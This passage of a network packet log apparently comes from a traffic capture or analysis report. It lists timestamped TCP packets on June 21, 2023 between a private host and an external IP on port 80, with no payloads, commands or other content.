Jun 21, 2023 04:27:58.611910105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.611922026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612041950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612102985 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.612124920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612306118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612334013 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612359047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612374067 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.612392902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612416983 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.612427950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612452984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612477064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612514973 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.612538099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612540007 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.612565041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612588882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612632036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.612672091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612695932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612718105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612750053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612756968 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.612780094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612797022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.612831116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612855911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612860918 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.612914085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.612927914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612952948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.612998962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613065004 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613094091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613118887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613142967 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613166094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613188982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613189936 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613209963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613234997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613257885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613282919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613296986 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613306999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613317966 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613332987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613373041 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613380909 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613408089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613430023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613455057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613468885 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613487959 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613513947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613540888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613567114 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613605022 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613630056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613653898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613692999 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613701105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613717079 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613725901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613787889 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.613836050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613864899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613888979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.613970995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614012003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614057064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614080906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614124060 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614146948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614170074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614195108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614218950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614243984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614252090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614268064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614291906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614296913 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614316940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614340067 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614372015 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614397049 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614418983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614445925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614469051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614499092 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614514112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614573956 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614605904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614631891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614654064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614676952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614701033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614707947 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614728928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614746094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614790916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614815950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614839077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614844084 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614869118 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614886045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614921093 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614945889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614969015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614993095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.614995003 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.614995003 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.615046978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.615071058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.615093946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.615098953 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.615117073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.615119934 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.615293980 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.635118008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.635150909 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.635179043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.635245085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.636084080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636112928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636141062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636198044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.636234045 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.636419058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636447906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636475086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636516094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636519909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.636595964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636598110 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.636624098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636652946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636678934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636734962 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.636734962 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.636962891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.636992931 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637020111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637046099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637068987 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.637105942 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.637339115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637367010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637392998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637417078 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637442112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637464046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.637495995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.637715101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637768984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637794971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637820959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637831926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.637883902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.637909889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637959003 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.637985945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638011932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638025999 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.638060093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.638153076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638191938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638227940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638253927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638261080 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.638298035 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.638621092 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638705015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638732910 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638757944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638772964 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.638802052 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.638839960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638875961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638910055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638933897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.638945103 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.638993025 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639067888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639103889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639127970 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639139891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639177084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639199972 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639211893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639254093 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639273882 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639305115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639347076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639381886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639409065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639416933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639430046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639455080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639491081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639511108 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639525890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639564037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639579058 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639600039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639636040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639671087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639689922 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639705896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639720917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639749050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639801025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639803886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639838934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639874935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639897108 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.639909983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639945984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.639981985 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640001059 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640016079 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640053034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640086889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640086889 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640110970 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640125036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640160084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640181065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640196085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640233040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640255928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640297890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640355110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640399933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640419960 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640435934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640471935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640496016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640507936 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640521049 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640547037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640585899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640621901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640647888 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640657902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640666008 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640693903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640729904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640779018 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640785933 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640841007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640888929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640902996 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640924931 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640939951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.640960932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.640995979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.641017914 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.641031981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.641067982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.641103029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.641124010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.641138077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.641175032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.641208887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.641211987 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.641237020 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.641244888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.641278982 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.641340971 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.660868883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.660933971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.660980940 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.661734104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.661782980 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.661825895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.661848068 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.661871910 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.661878109 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.661933899 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.661999941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662053108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662055969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.662098885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662142992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662156105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.662189007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662194967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.662236929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662283897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662298918 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.662331104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662393093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.662444115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662493944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662537098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662592888 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.662723064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662770987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662785053 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.662817001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662863016 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.662904024 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.663139105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663193941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663199902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.663239002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663285017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663343906 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.663480997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663575888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663621902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663640976 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.663669109 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.663669109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663714886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663759947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663774967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.663808107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663852930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.663861036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.664195061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.664252996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.664310932 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.664338112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.664386034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.664443970 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.666609049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.666707993 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.666713953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.666798115 CEST	80	49719	45.9.74.80	192.168.2.3
